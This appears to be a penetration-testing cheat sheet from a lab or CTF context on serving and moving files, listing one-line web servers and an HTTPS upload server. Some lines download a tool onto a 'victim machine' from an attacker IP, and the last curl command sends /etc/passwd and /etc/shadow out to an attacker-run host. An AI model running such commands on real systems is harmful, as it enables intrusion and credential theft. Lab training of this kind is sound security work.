Python3
Via web:
1
2
3
4
5
6
7
# On our machine:
python3 -m http.server 8888
# On victim machine:
wget http://10.10.16.5:8888/pspy64
chmod +x pspy64
Python2
1
python -m SimpleHTTPServer 7331
PHP
1
php -S 0.0.0.0:8080
Ruby
1
ruby -run -e httpd . -p 9000
Busybox
1
busybox httpd -f -p 10000
Surge.sh
This is an excellent option to host an Internet exposed web server. First we need to install surge with npm:
1
npm install --global surge
Then we need to execute the surge command and provide all the details needed to host our web server.
- File’s path, all the files within will be hosted.
- Name of your web server, this will be the subdomain you choose and it must have the surge.sh as domain, if it’s already taken it won’t work.
1 2 3 4 5 6 7 8 9 10 11 12
surge Running as shuciran@gmail.com (Student) project: /opt/test/ domain: blue-eyed-harmony.surge.sh upload: [====================] 100% eta: 0.0s (1 files, 15 bytes) CDN: [====================] 100% encryption: *.surge.sh, surge.sh (48 days) IP: 138.197.235.123 Success! - Published to blue-eyed-harmony.surge.sh
If this is the first time, you’ll need to provide an e-mail and a password.
If you want to exploit XSS, SSRF or any vulnerability from another server you’ll need to host a CORS file with content “*” this way you’ll allow consumption of resources from external entities.
Web Server Upload
Let’s see how we can configure the uploadserver module to use HTTPS for secure communication.
1) Install the uploadserver module.
1
Shuciran@htb[/htb]$ sudo python3 -m pip install --user uploadserver
2) Create a self-signed certificate.
1
Shuciran@htb[/htb]$ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
The webserver should not host the certificate. We recommend creating a new directory to host the file for our webserver.
3) Start Web Server
1
2
3
4
5
Shuciran@htb[/htb]$ mkdir https && cd https
Shuciran@htb[/htb]$ sudo python3 -m uploadserver 443 --server-certificate /root/server.pem
File upload available at /upload
Serving HTTPS on 0.0.0.0 port 443 (https://0.0.0.0:443/) ...
4) Transfer the file via CURL
1
Shuciran@htb[/htb]$ curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
We used the option –insecure because we used a self-signed certificate that we trust.